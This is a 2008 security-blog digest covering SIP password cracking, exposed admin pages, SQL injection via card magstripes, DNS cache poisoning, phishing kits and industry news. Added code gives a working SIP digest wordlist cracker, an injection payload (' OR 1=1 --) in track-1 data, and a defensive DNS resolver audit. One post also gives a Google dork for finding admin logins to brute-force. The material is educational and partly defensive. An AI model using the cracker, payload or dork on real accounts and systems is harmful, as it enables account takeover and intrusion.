Posted: 01 Aug 2008 08:41 AM CDT
Posted: 01 Aug 2008 05:26 AM CDT
SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. If you don’t have OpenSSL installed or encounter any building problems try ‘make...
Read the full post at darknet.org.uk
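As an added illustration of what SIPcrack has to reverse (this is not code from the SIPcrack suite), the block below implements the SIP digest computation from RFC 3261 section 22 (HA1, HA2 and the response, with and without qop), parses the Authorization header as it appears in a captured REGISTER, and runs a wordlist against it. The header is constructed here, with its response derived from the password "secret123", so the script runs without a pcap; a real run would take the header fields from the capture.

```python
import hashlib
import re


def sip_digest_response(username, realm, password, method, uri, nonce,
                        qop=None, nc=None, cnonce=None):
    """SIP Digest 'response' value (RFC 3261 s.22 / RFC 2617).

    HA1 = MD5(user:realm:password), HA2 = MD5(method:uri)
    without qop: MD5(HA1:nonce:HA2)
    with qop:    MD5(HA1:nonce:nc:cnonce:qop:HA2)
    """
    ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    if qop:
        data = f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}"
    else:
        data = f"{ha1}:{nonce}:{ha2}"
    return hashlib.md5(data.encode()).hexdigest()


# key="quoted value" or key=bareword, comma separated
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(header):
    """Turn 'Digest username="a", realm="r", ..., algorithm=MD5' into a dict."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest Authorization header")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM_RE.finditer(params)}


def crack(method, authorization_header, wordlist):
    """Try each candidate; return the password that reproduces the response."""
    p = parse_authorization(authorization_header)
    for candidate in wordlist:
        guess = sip_digest_response(p["username"], p["realm"], candidate,
                                    method, p["uri"], p["nonce"],
                                    p.get("qop"), p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


# --- constructed sample "capture" ------------------------------------------
# A real header comes out of a pcap of a REGISTER transaction; this one is
# built from the password "secret123" so the example runs offline.
def build_sample_header(qop=None):
    nonce = "5c3a1b2e7f90"
    nc, cnonce = ("00000001", "0a4f5e") if qop else (None, None)
    resp = sip_digest_response("alice", "sip.example.org", "secret123",
                               "REGISTER", "sip:sip.example.org", nonce,
                               qop, nc, cnonce)
    hdr = (f'Digest username="alice", realm="sip.example.org", nonce="{nonce}", '
           f'uri="sip:sip.example.org", response="{resp}", algorithm=MD5')
    if qop:
        hdr += f', qop={qop}, nc={nc}, cnonce="{cnonce}"'
    return hdr


WORDLIST = ["password", "1234", "alice", "welcome", "secret123", "letmein"]

if __name__ == "__main__":
    for qop in (None, "auth"):
        found = crack("REGISTER", build_sample_header(qop), WORDLIST)
        print(f"qop={qop}: password = {found}")
```

Each guess costs three MD5 operations and needs nothing but the sniffed fields, which is why a captured SIP registration with a dictionary password is as good as a cleartext one; the nonce only stops replay, not offline guessing.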
Posted: 01 Aug 2008 04:31 AM CDT
Another WiFi program: wsrtool.py This Python program allows you to process wsr files (capture files of the ISM spectrum, created by Chanalyzer with a Wi-Spy adapter).
You need to install the Python module Construct.
Here’s an unfiltered capture:
And here I used a band-pass filter with cutoff frequencies 2420 MHz and 2445 MHz:
Posted: 01 Aug 2008 01:36 AM CDT
So simple and non-destructive!
Posted: 01 Aug 2008 12:55 AM CDT
As system administration has matured and information technology has come along over the past decade or so we've learned many things which appear to go in one ear and then out the other. Most of these deal with secure systems design, and basically how to keep from making yourself an easy target for hackers.
With that glowing in the back of my mind like an energy-saving lightbulb, I went on a hunt for things that should not be available on the web.
First off, I think I've had this debate with people so many times it hurt my brain - but administrative interfaces to applications, appliances, or widgets simply shouldn't be available to the general web-based casual viewer. Worse yet, it should definitely *not* be index-able with a search engine.
With that in mind, I decided to give Google a chance to see how many people still allow open administrator pages on the 'net. Granted, sometimes you just can't help this, right... but if I can index your admin page, and your authentication mechanism isn't well-built... it's only a matter of time before I pwn you. Check it out for yourself: go to Google, use the search term inurl:"admin" intext:administrator login and see what you get. Scary, huh? How many of these systems that you find do you think you can grind away at until you guess a password via brute-force?
Come on, boys and girls... you should *not* put an admin interface on the general net; that's what we have VPNs for, and management networks. *sigh*.
Posted: 31 Jul 2008 08:20 PM CDT
Posted: 31 Jul 2008 06:34 PM CDT
You can download the videos made during The Last HOPE from http://hopetracker.donthax.me/
Bittorrent is being used to re-distribute the content, so help us seed.
You will find the videos from subjects as:
Posted: 31 Jul 2008 05:05 PM CDT
SQL injection in web apps is sooooo old. It still exists everywhere and security companies are still making good moolah by capturing 'crown jewels' by exploiting this. However, I'm not sure that SQL injection testing for non-web-based applications/scenarios has caught on. Are they even worth trying? For example, I'd really like to test the logic for the following (for starters) at some point in life:
1. Cell phones - EMEA registration. Attempt to SQL inject the backend during registration and/or normal communication. Ditto with normal phone lines - would that work? Before I even say "Only one way to find out..." I should really read up on cell phones to test the theory.
2. Magstripes on cards - change data in the magstripe of ID cards, hotel access cards, credit cards, debit cards etc. to SQL inject the backend. Hmm... my name/cardnumber/PIN is now ' OR 1=1 -- ?
Something like Little Bobby Tables.
3. Checks - change the account number on checks to SQL inject the backend. I'm almost certain this would fail because of the MICR E-13B character restrictions... ah well.
Ah well... I would need to get back into security consulting at some point if I want to test this out in a legal way.
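The magstripe idea can be worked through offline. The example below is added here and is not code from the post's author: it parses ISO/IEC 7813 track 1 data (track 2 is digits and separators only, so the name field on track 1 is where a payload like the one above would have to live), then runs the same lookup against a constructed SQLite "issuer" backend twice, once with the query built by string concatenation and once parameterised. The card table and the three stripes are constructed for the example.

```python
import re
import sqlite3

# ISO/IEC 7813 track 1 layout: %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
# The name field is alphanumeric (uppercase letters, digits, space and a few
# symbols including the apostrophe), so ' OR 1=1 -- can be encoded there.
# Track 2 carries digits and separators only, which is why the name field is
# the interesting one for this experiment.
TRACK1_RE = re.compile(r"^%B(\d{1,19})\^([^^]{2,26})\^(\d{4})(\d*)\?$")


def parse_track1(track):
    """Split a track 1 string into PAN, cardholder name and expiry (YYMM)."""
    m = TRACK1_RE.match(track)
    if not m:
        raise ValueError("malformed track 1 data")
    return {"pan": m.group(1), "name": m.group(2), "exp": m.group(3)}


def make_db():
    """Constructed backend: three active cards in an in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cards (pan TEXT, name TEXT, exp TEXT, active INTEGER)")
    conn.executemany("INSERT INTO cards VALUES (?, ?, ?, ?)", [
        ("4111111111111111", "DOE/JOHN", "2512", 1),
        ("5500000000000004", "SMITH/JANE", "2603", 1),
        ("340000000000009", "O'BRIEN/PAT", "2711", 1),
    ])
    return conn


def authorize_vulnerable(conn, track):
    """String-built query: whatever is on the stripe becomes part of the SQL."""
    t = parse_track1(track)
    sql = (f"SELECT pan FROM cards WHERE pan = '{t['pan']}' "
           f"AND name = '{t['name']}' AND active = 1")
    return [row[0] for row in conn.execute(sql)]


def authorize_safe(conn, track):
    """Parameterised query: stripe contents are bound as data, never parsed as SQL."""
    t = parse_track1(track)
    sql = "SELECT pan FROM cards WHERE pan = ? AND name = ? AND active = 1"
    return [row[0] for row in conn.execute(sql, (t["pan"], t["name"]))]


def try_vulnerable(conn, track):
    """Run the vulnerable lookup but report a broken query instead of raising."""
    try:
        return authorize_vulnerable(conn, track)
    except sqlite3.OperationalError as exc:
        return f"SQL error: {exc}"


# Constructed stripes. The hostile one carries an unknown PAN and puts the
# injection in the name field, in uppercase because track 1 cannot encode
# lowercase (SQL keywords are case-insensitive, so that costs nothing).
LEGIT_TRACK = "%B4111111111111111^DOE/JOHN^25121011234567890?"
OBRIEN_TRACK = "%B340000000000009^O'BRIEN/PAT^27111011234567890?"
HOSTILE_TRACK = "%B4000000000000002^' OR 1=1 --^25121011234567890?"

if __name__ == "__main__":
    conn = make_db()
    for label, track in (("legit", LEGIT_TRACK), ("o'brien", OBRIEN_TRACK),
                         ("hostile", HOSTILE_TRACK)):
        print(f"{label:8} vulnerable={try_vulnerable(conn, track)!r}")
        print(f"{label:8} safe      ={authorize_safe(conn, track)!r}")
```

The hostile stripe makes the concatenated query match every active card while the parameterised one matches nothing, and the legitimate O'BRIEN card breaks the concatenated query outright: the apostrophe that a name can legitimately contain is the same character the injection needs, so filtering it is not an option and binding parameters is the fix.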
Posted: 31 Jul 2008 04:13 PM CDT
It may be the dog days of summer, but it is the height of the baseball season and the trade deadline just passed. Not without some blockbuster deals going down though. The biggest one is a three-team deal involving the Dodgers, Pirates and the Red Sox. The BoSox give up the heart and soul of their championship team, future hall of famer Manny Ramirez. In exchange they get Jason Bay from the Pirates. A few other players are involved, but who cares. Does this mean the Sox are giving up on this season? As a Yankee fan I can't tell you how happy I am not to see Manny so many times a year. I also think Joe Torre will do a great job of managing Manny out in LA. Good luck to Manny. Though he killed us for years, I respected his talent.
Speaking of the Yankees, they have made a few moves for the pennant run. In addition to their own trade with the Pirates to get Xavier Nady and Damaso Marte, they pulled off a great deal yesterday getting Pudge Rodriguez to fill in as catcher for Jorge Posada. This could be a huge deal for the Yankees. They gave up Kyle Farnsworth, who, while he threw well this year, gave up home runs like candy. I am flying up to NY with my two sons tomorrow and will be at the Stadium tomorrow night to watch the Yanks play the Angels, who also made a big trade for the Braves' Mark Teixeira.
Another future hall of famer, Ken Griffey, Jr was also traded to the White Sox today. Wow! What a day in baseball. I can't wait to sit in the temple that is Yankee Stadium with my two boys tomorrow. It is like a dream come true, similar to taking them to a Steeler game last year. With all of the action going on around baseball it is also a great time to do it.
Posted: 31 Jul 2008 03:55 PM CDT
Continuing the rapid consolidation, or maybe the swallowing, of the DLP market, McAfee, while announcing flat earnings today, also announced that it is acquiring Reconnex for $46 million in cash. That just about does it in the DLP market, with most of the pots having found a cover. Congrats to all of the folks at Reconnex!
Posted: 31 Jul 2008 03:33 PM CDT
For those interested, F-Secure is having another reverse engineering contest tomorrow.
(Photo under Creative Commons from pt's Photostream)
Posted: 31 Jul 2008 03:15 PM CDT
Been busy but I still wanted to post something quick.
If you didn't know, F-Secure's yearly reverse engineering challenge, Khallenge, is about to start. It works by using levels - you download a binary, figure out how to reverse it and get the password to the next level. I've done it in years past and have gotten to the last level but not beyond. Maybe I'll try this year. It starts August 1, 2008 at midnight (EEST), which should be about 5PM July 31, 2008 EST. It lasts only two days, so get out there and get reversing! http://www.khallenge.com/
There are many excellent blogs out there which have a lot of great information on reverse engineering and malware analysis. However, I want to call out one on which I consistently find excellent information on new threats and how to perform malware analysis: The Websense Security Labs Blog.
I'll be the first to admit that when I think of Websense I think of content filtering and not malware analysis. (Actually I think of some poor fool who has to visit every site that gets submitted to categorize it.) However, they have some really smart people working for them who do a lot of great malware analysis work. They constantly publish excellent blog entries about different aspects of malware. This is one of the blogs which I will ensure I read whenever they publish something new. Their RSS feed is here and I highly recommend it.
Anyone have any good resources they'd like to mention?
Posted: 31 Jul 2008 02:30 PM CDT
Sophos intends to buy Utimaco. Until then, Sophos will resell SafeGuard Enterprise and they now have a mutual referral agreement for all products from both companies. Utimaco will become a new business unit focused on data security and the SafeGuard brand will be retained.
From the customer announcement email:
Posted: 31 Jul 2008 01:19 PM CDT
Posted: 31 Jul 2008 01:01 PM CDT
Loads of awesome looking presentations this year! So hard to choose from. I really hope I'll have time to see most of them and not be stuck 24x7 in little rooms answering questions with people holding microphones. :) I hear the conference attendance is PACKED and suggest that if you want to get in to see a popular speaker/talk, get there early. Oh, the same goes for the OWASP/WASC Party: get to the Breach booth early.
Day 1: 10:00 to 11:00
Bad Sushi: Beating Phishers at Their Own Game
Nitesh Dhanjani, Senior Manager
Billy Rios, Microsoft
I saw this talk at Blue Hat in Seattle a couple of months back. Not only is the data they present extremely compelling, but their humor and speaking style really put it over the top. With so many dry talks in our industry, when speakers are actively engaging it really makes a difference.
Day 1: 11:15 to 12:30
The vulnerability itself and disclosure drama aside, I have it on good authority that Dan will provide some important lessons learned as a result of the fiasco with regards to software serviceability. I'm really interested in hearing what he has to say about how we can improve our situation so we can adapt better to a similar scenario down the road.
Day 1: 13:45 to 15:00
Iron Chef: Fuzzing Challenge
This event was a lot of fun last year when I participated as a "celebrity judge". Just don't be under the impression that this is a scientific experiment of any kind. Instead, simply enjoy the "show", in which you can participate if you'd like. You get some code, find vulnerabilities however you want, and share your results. Simple! We should give them RSnake's blog software. :)
Day 1: 15:15 to 16:30
Xploiting Google Gadgets: Gmalware and Beyond
Day 1: 16:45 to 18:00
FLEX, AMF 3 and BlazeDS: An Assessment
Don't know much about the speakers or the talk itself, but the subject matter looks compelling and particularly timely. I've been doing a lot of my own research in Flash/Flex as well and there is a lot of unexplored territory within. XSS and CSRF malware payloads can and will get a lot worse with this stuff.
Day 2: 10:00 to 11:00
Encoded, Layered and Transcoded Syntax Attacks: Threading the Needle Past Web Application Security
Going only because I have to speak alongside Arian. :) This presentation is the result of a large amount of experimentation on live websites using seriously obfuscated attack techniques. Some of the methods we're still not exactly sure why they work, only that they do in extreme edge cases. What we're also learning is that there are A LOT of web application vulnerability edge cases out there.
Day 2: 11:15 to 12:30
No More Signatures: Defending Web Applications from 0-Day Attacks with ModProfiler Using Traffic Profiling
A serious toss-up between this one and Threats to the 2008 Presidential Election, which I'm sure is also going to be stellar. For me, I need to stay as up-to-date as I can in WAF technology evolution and Ivan is THE MAN in the open source space.
Day 2: 13:45 to 15:00
REST for the Wicked
Love the talk title and really interested in learning about any new attack techniques on SOAP and surrounding technologies. This area also continues to be a struggle for automated testing.
Day 2: 15:15 to 16:30
Get Rich or Die Trying – Making Money on the Web, the Black Hat Way
Again, only because I HAVE to be there. :) I've been wanting to do a presentation like this for quite some time and have finally been able to pull together enough data and public examples to make it possible. The idea is to demonstrate how to make serious money illicitly using the most simplistic of web attack techniques, all of which have already been used in the real world, and then speculate a little on other possibilities. All story driven, not meant to be ground breaking attack-wise, just really thought provoking and fun.
Day 2: 16:45 to 18:00
Pushing the Camel Through the Eye of a Needle
Only because the Sensepost guys are super l33t, always have exceptional material, and I've never been to a bad presentation yet. Didn't even bother to read the description, I know it'll be worthwhile. Hopefully I can make it over there after my presentation.
Posted: 31 Jul 2008 12:50 PM CDT
The live stream should be active about 6:45 PM EDT, Thursday, July 31st. We should begin recording the live show at about 7:00 PM EDT. Please keep in mind that these times are all estimates, but we will try to do the best that we can.
Don't forget to join in on the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
Please join us, and thanks for listening!
- Larry & Paul
Posted: 31 Jul 2008 11:50 AM CDT
Researchers from the UCSB Department of Computer Science (Marco Cova, Christopher Kruegel, and Giovanni Vigna) have released a paper at this Monday’s USENIX conference in San Jose, CA, entitled “There is No Free Phish: An Analysis of ‘Free’ and Live Phishing Kits”, detailing the illicit backdoors in already illicit software, whereby the data already stolen from the unsuspecting user, the victim of the phishing attack, is stolen once more by the criminals responsible for the kit publication! Once again, the old adage is relevant: “There is no honor amongst thieves”. You can download a PDF formatted copy of the paper from the Infosecurity.US Document Repository, or via USENIX.
Posted: 31 Jul 2008 09:00 AM CDT
July 31, 2008 - Volume 3, #66
Top Security News
Is there a "secure enough"?
Top Blog Postings
I'll take one defeat and despair to go...
Posted: 31 Jul 2008 08:41 AM CDT
Posted: 31 Jul 2008 08:35 AM CDT
Man, why didn't I think of this. I've seen video of people social engineering their way through many restricted areas in the past; some claiming to have forgotten something in the target locations, others claiming to be Jason Biggs of American Pie fame. None of them are quite as simple, and effective, as just claiming you're the DJ! Watch as this man gets into every club he tries just by claiming he's the DJ and is spinning shortly. Watch to the end of the video to see some reasonably funny attempts at DJ social engineering in completely random places.
Learn how to hack at 5min.com
Posted: 31 Jul 2008 04:31 AM CDT
This is a pretty old issue, but this is an interesting new implementation of an old idea. Using your browser history and by matching your browsing habits, the site attempts to guess your gender with a weighting system according to the gender demographics for a list of fairly popular sites. It’s not super accurate unless you [...]
Read the full post at darknet.org.uk
Posted: 31 Jul 2008 02:14 AM CDT
This afternoon on my MacBook Pro, Mail and Safari were acting screwy. Safari would give me a beach ball when I tried to fill out a form on Amazon and Mail would give me a beach ball when it did an address look up when I typed someone’s name in the To: field. I tried to open Address Book, but it wouldn’t open, instead giving me a “not responding” status immediately in the Force Quit Applications window.
Not having the skills or time to really find out what was going on, I popped open Cocktail and repaired the disk permissions and left to run some errands. I came back 3 hours later, glanced at the Cocktail log and opened a new email. When I typed a name into the address field, it did the look up (I could see the spinner working) and then stopped, not having found the name. This time I was able to open Address Book to see that everything was gone. All my contacts. Thousands of them. Gone. I visited the MobileMe page; naturally, the contacts were gone there too. I then opened my iPhone to turn off syncing before it got wiped - too late. Since I didn’t find the problem before SuperDuper made my daily backup, it looks like I have lost my most recent changes, but luckily nearly everything is saved in my Daylite database so this isn’t critical - just a huge pain in the ass.
I had been reading headlines about the MobileMe problems, but never suffered any until this afternoon. I was a .Mac customer before solely for the convenience of the iDisk to backup a small amount of critical data so Apple won’t lose any of my money, but I have turned off over-the-air sync and don’t plan to turn it on until 2010 or so. If my contacts got wiped from my phone while I was on the road I would be crippled. Nope, can’t take that chance.
Posted: 30 Jul 2008 09:24 PM CDT
In a recent blog post, I cited a study by researchers at the University of Michigan, saying 75% of banking web sites had design flaws, making them vulnerable to hackers.
In a recent article by Larry Seltzer of eWeek, he said the findings from the study, which came out in 2006, are outdated. He said the results were either not relevant any more -- such as insecure login pages not using https -- or not real threats -- non-https Contact Us pages.
He goes through the rest of the report point-by-point and makes some interesting points.
Posted: 30 Jul 2008 07:47 PM CDT
The Economic Times of India reports significant scrutiny is being applied (yet again) to RIM’s deployment of Blackberry devices to the general public, and the security measures to be taken. More headaches for RIM (NasdaqGS: RIMM), or can they comply with the recommendations of the Government of India Department of Telecommunications (DoT)?
Posted: 30 Jul 2008 07:15 PM CDT
It's summertime meaning that the first half of 2008 has passed. So time for papers to be released and for us to read them.
1. Stopbadware released a paper using data from Google's Safe Browsing initiative and found that 200,000 websites were engaged in badware behavior. Now there is also a small update:
Note: A network block owner is not always the owner or operator of the infected servers on that block, and our publication of these data is intended to inform and educate, not to assign blame.(Source: Stopbadware.org)
As some people mentioned, most of the infected servers appear to be located in China. The infection vector through websites has increased a lot compared to last year (see: Drive-by downloads). Read the entire paper for some interesting insights.
2. Papers from WOOT '08 and HotSec '08
Two interesting workshops took place this week: 2nd USENIX Workshop on Offensive Technologies (WOOT '08) and 3rd USENIX Workshop on Hot Topics in Security (HotSec '08). Both of them produced some interesting documents! Some examples:
3. IBM X-Force released security statistics
4. Websense released mid year 2008 report
(Photo under Creative Commons from Dhammza's Photostream)
Posted: 30 Jul 2008 07:03 PM CDT
I have seen a lot of reports on attacks on unpatched DNS caching servers but with little or no (technical) information. A lot seems to be based on the email posted on the Fedora mailing list by user James Kosin. (see Did the DNS attacks part 1)
The logs he provided were not signs of exploitation, but an indication of a scan for open resolving DNS servers. An increase in DNS scanning has been reported by Arbor Networks in their "30 Days of DNS Attack Activity" post of the 28th of July.
Plotting UDP/53 attack activity (the thicker dark "pinkish red" line below) across Arbor's "anonymous statistics program" participants (~70 ISPs) illustrates an order of magnitude increase in UDP/53 and/or DNS events beginning around July 9, 2008. Note that while most of the data from the anonymous statistics program is based on Network and Transport layer attributes of traffic, there are specific DNS capabilities that exist in our Threat Management System (TMS) product that deal extensively with payloads as well. Given that this vulnerability was partially disclosed on July 8, I suspect a great deal of this traffic is name server vulnerability scanning, as opposed to malicious cache poisoning attempts, although there may well be a mix of the latter.
So still no conclusive proof there. But if you look at the graphic from Arbor Networks, the increase in DNS scanning since the 8th of July is concerning. Also the small difference after the 13-day leak is an indication of some kind.
Now, the metasploit exploit needs a service to determine the source port used by the target name server. The 'check' command does just that. The exploit itself will also query the Metasploit service if you set SRCPORT to 0. So no information is sent to metasploit.com unless SRCPORT is manually set to '0' or the check command is run (non-standard for aux modules). (Source: HD Moore on the Full Disclosure mailing list). For more information, check the entire post.
So, it's useful to know that in some cases the metasploit tool will report information back. Now let's look at this Twitter message from the 24th of July:
HD Moore: About 75% of the folks checking exploitability via metasploit module are vulnerable. (So this is telling us that people were testing this tool and most of the DNS servers they were tested on were vulnerable (24 June).) This is not a good sign of course. But it doesn't prove malicious activity. Until I saw the following message on Twitter:
UPDATE: As a result of the SBC/ATT DNS servers getting poisoned, HD Moore has added a module in Metasploit to compare the cache of two DNS servers. (/UPDATE)
Patching is in progress, but as Dan Kaminsky said, patching is not the final solution. It only makes the exploit a lot harder. There is still a 1% chance each hour to succeed in cache poisoning. There is a fierce discussion going on in the comments of the latest Bruce Schneier post: "The DNS Vulnerability". The article itself makes a good point that by having designed security into the system in the first place, we wouldn't need the patch. I recommend reading it, including the comments.
So again, advice for sysadmins: how can you detect this attack? Look for this kind of pattern in your logfiles:
Or you can have a look at research described in Jose Avila's Recursive DNS Cache Auditing presentation in addition to the ONZRA security research tool CacheAudit v.01, see the Research folder at ONZRA for the CacheAudit download. Scan for udp/tcp port 53 in your network and check and patch the servers asap. Even if they are internal servers.
Advice for end users: use the DNS tool on the doxpara.com website or the web-based tool from DNS-OARC. If it appears you are using an unsafe DNS server, switch to OpenDNS. Here are the instructions.
I'm also considering how this can affect hotspot users and similar mobile users in combination with tools like Evilgrade or Karmetasploit. Even without this DNS exploit, both toolkits used on untrusted LANs or WLANs can be dangerous. But that is for another post.
UPDATE: Zero Day just posted a similar article that additionally includes some interesting DNS Security Surveys from the past. Check it out.
UPDATE (30/07/2008): Brian Krebs from the Washington Post just wrote an article on Evilgrade and hotspots. It seems that iTunes and Mac OS updates were fixed in December '07. Read here for more info.
FINAL UPDATE (30/07/2008): HD Moore has put some more details in a post on Metasploit on what happened. The enemy has entered the gate now and is inside.
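The Metasploit check and the DNS-OARC web test both work by watching which source ports and transaction IDs a resolver uses for its own outbound queries: a patched resolver spreads them across the port range, an unpatched one reuses a port (and older code also hands out predictable IDs), leaving only the 16-bit ID to guess. An offline version of that check is added below; it is not the Metasploit module, the DNS-OARC tester or the ONZRA CacheAudit tool, and the log lines (one outbound query per line: resolver address, source port, transaction ID) and the rating thresholds are this example's own assumptions.

```python
from collections import defaultdict

# Constructed sample of outbound queries leaving two caching resolvers.
# Fields: resolver_ip  source_port  transaction_id. A real run would take
# these from a capture on the resolver's upstream interface.
SAMPLE_LOG = """\
10.0.0.1 32768 0x4a12
10.0.0.1 32768 0x4a13
10.0.0.1 32768 0x4a14
10.0.0.1 32768 0x4a15
10.0.0.1 32768 0x4a16
10.0.0.1 32768 0x4a17
10.0.0.1 32768 0x4a18
10.0.0.1 32768 0x4a19
10.0.0.2 51233 0x9f03
10.0.0.2 17842 0x21c8
10.0.0.2 63901 0xe55a
10.0.0.2 2891 0x7b10
10.0.0.2 44107 0x0c9e
10.0.0.2 30566 0xd2f7
10.0.0.2 58214 0x5a61
10.0.0.2 11375 0xb084
"""


def parse_log(text):
    """Group (source_port, txid) pairs by resolver address, in capture order."""
    per_resolver = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ip, port, txid = line.split()
        per_resolver[ip].append((int(port), int(txid, 16)))
    return dict(per_resolver)


def is_sequential(values):
    """True when every value is exactly one more than the previous one."""
    return len(values) > 1 and all(b - a == 1 for a, b in zip(values, values[1:]))


def assess(per_resolver, min_samples=8):
    """Rate each resolver's source-port and transaction-ID behaviour."""
    report = {}
    for ip, samples in per_resolver.items():
        ports = [p for p, _ in samples]
        txids = [t for _, t in samples]
        n = len(samples)
        distinct_ports = len(set(ports))
        port_span = max(ports) - min(ports)
        seq_ids = is_sequential(txids)
        # Thresholds are assumptions for this example: a resolver that reuses
        # a port, keeps its ports in a narrow window, or hands out consecutive
        # IDs leaves a forged reply far fewer values to guess.
        if n < min_samples:
            rating = "UNKNOWN"
        elif distinct_ports < n // 2 or port_span < 1024 or seq_ids:
            rating = "POOR"
        else:
            rating = "GOOD"
        report[ip] = {
            "rating": rating,
            "samples": n,
            "port_distinct": distinct_ports,
            "port_span": port_span,
            "txid_sequential": seq_ids,
        }
    return report


if __name__ == "__main__":
    for ip, r in assess(parse_log(SAMPLE_LOG)).items():
        print(ip, r)
```

A GOOD rating here only says the ports and IDs looked randomised in a handful of queries; as the post notes, a patched resolver is harder to poison, not immune, and the check says nothing about whether a cache has already been poisoned, which is what the cache-comparison module and CacheAudit are for.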
Posted: 30 Jul 2008 07:02 PM CDT
Rsnake joined twitter and did it with a bang. In about two hours, he found an XSS using a trusted domain of Twitter. Luckily, Twitter saw the tweet and it got fixed in about 90 minutes total. The crossdomain.xml has indeed been thoroughly revised. A chain is only as strong as its weakest link.
Read this post from Ed Bellis for the details and the response from Twitter. A story with a happy end.
Robert "RSnake" Hansen is a web application specialist and one of the authors of the XSS book (XSS Attacks - Cross Site Scripting Attacks Exploits and Defense). You can download a zipped up version of Chapter 5 and the table of contents (free sample).
(Photo under Creative Commons from Darwin Bell's Photostream)
Posted: 30 Jul 2008 07:01 PM CDT
I was browsing through the Backtrack forums and noticed that Backtrack-fr opened up a webshop for T-shirts (French) a while back. It's based on the spreadshirt site, is based in Germany and can deliver almost all over Europe. The US version is in the making. I might buy one or two. So what about Backtrack 4?
While I was listening to the Pauldotcom podcast about Paul's experiments with the Asus Eee PC, they mentioned Backtrack 4 (Episode 114). He was replacing the Xandros Linux version with Ubuntu and used Backtrack only from a USB thumb drive. He wouldn't recommend installing it as the default OS, as Backtrack 3 is really made as a live distribution.
He then mentioned that Backtrack 4 would be more built as a complete distribution in comparison to the previous versions. This can only mean more flexibility and more pwnage. I will be looking forward to it!!
You are subscribed to email updates from Black Hat Security Bloggers Network